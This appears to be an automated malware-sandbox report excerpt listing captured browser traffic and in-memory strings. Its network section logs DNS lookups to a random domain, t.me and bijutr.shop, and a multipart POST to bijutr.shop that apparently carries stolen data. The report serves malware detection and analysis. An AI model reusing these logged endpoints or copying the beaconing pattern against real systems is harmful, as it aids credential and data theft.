                Source: global trafficHTTP traffic detected: GET /b2?rn=1735286739103&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=309DCA2A26BF68F127E0DF4827176945&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1Host: sb.scorecardresearch.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: UID=10344ddb4a73bf8506bf1b41735279840; XID=10344ddb4a73bf8506bf1b41735279840
                Source: global trafficHTTP traffic detected: GET /c.gif?rnd=1735286739103&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=00d263f4b17344089ebf5bec809664e2&activityId=00d263f4b17344089ebf5bec809664e2&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=CA9C2839891B4BAE9B46E9232B945869&MUID=309DCA2A26BF68F127E0DF4827176945 HTTP/1.1Host: c.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: USRLOC=; MUID=309DCA2A26BF68F127E0DF4827176945; _EDGE_S=F=1&SID=0CB1C65767D864F11232D335664165D0; _EDGE_V=1; SM=T
                Source: 5f773af2-be2b-479c-9373-554487c7dec0.tmp.28.drString found in binary or memory: "url": "https://www.youtube.com" equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %https://www.youtube.com/?feature=ytca equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: @https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000003.1810147143.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810103942.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1809721329.000036EC003D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000015.00000003.1810147143.000036EC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1810103942.000036EC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1809721329.000036EC003D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) #logo{background-image:url(icons/google_logo.svg)}#imageDoodle{cursor:pointer;outline:0}#imageDoodle[tabindex='-1']{cursor:auto}:host([doodle-boxed_]) #imageDoodle{background-color:var(--ntp-logo-box-color);border-radius:20px;padding:16px 24px}:host-context(.focus-outline-visible) #imageDoodle:focus{box-shadow:0 0 0 2px rgba(var(--google-blue-600-rgb),.4)}#imageContainer{display:flex;height:fit-content;position:relative;width:fit-content}#image{max-height:var(--ntp-logo-height);max-width:100%}:host([doodle-boxed_]) #image{max-height:160px}:host([doodle-boxed_][reduced-logo-space-enabled_]) #image{max-height:128px}#animation{height:100%;pointer-events:none;position:absolute;width:100%}#shareButton{background-color:var(--ntp-logo-share-button-background-color,none);border:none;height:var(--ntp-logo-share-button-height,0);left:var(--ntp-logo-share-button-x,0);min-width:var(--ntp-logo-share-button-width,0);opacity:.8;outline:initial;padding:2px;position:absolute;top:var(--ntp-logo-share-button-y,0);width:var(--ntp-logo-share-button-width,0)}#shareButton:hover{opacity:1}#shareButton img{height:100%;width:100%}#iframe{border:none;
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/: equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1889239936.000036EC00948000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J equals www.youtube.com (Youtube)
                Source: chrome.exe, 00000015.00000002.1886957092.000036EC002E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: jCkYzqqYDalcEKzOzlTGtPWyRfbt.jCkYzqqYDalcEKzOzlTGtPWyRfbt
                Source: global trafficDNS traffic detected: DNS query: t.me
                Source: global trafficDNS traffic detected: DNS query: bijutr.shop
                Source: global trafficDNS traffic detected: DNS query: www.google.com
                Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
                Source: global trafficDNS traffic detected: DNS query: bzib.nelreports.net
                Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
                Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
                Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
                Source: global trafficDNS traffic detected: DNS query: assets.msn.com
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----58Y589HL6P8QIEKNG47QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopContent-Length: 255Connection: Keep-AliveCache-Control: no-cache
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/1423136
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2162
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2517
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/2970
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078
                Source: chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3078isImmediateModeRenderer
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205
                Source: chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3205:
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3206
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3452
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3498
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3502
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3577
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3584
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3586
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3623
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3624
                Source: msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3625
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3832
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3862
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3965
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/3970
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4324
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4384
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4405
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4428
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4551
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4633
                Source: chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4722
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4836
                Source: chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4901
                Source: chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/49013
                Source: chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/49017
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937
                Source: chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/4937)
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1887499248.000036EC004A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5007
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5055
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1957582472.000033FC00390000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5061
                Source: chrome.exe, 00000015.00000003.1808374579.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1806859201.000036EC003D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000002.1890376790.000036EC00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.1808413360.000036EC00838000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001A.00000003.1947577978.000033FC0036C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5281
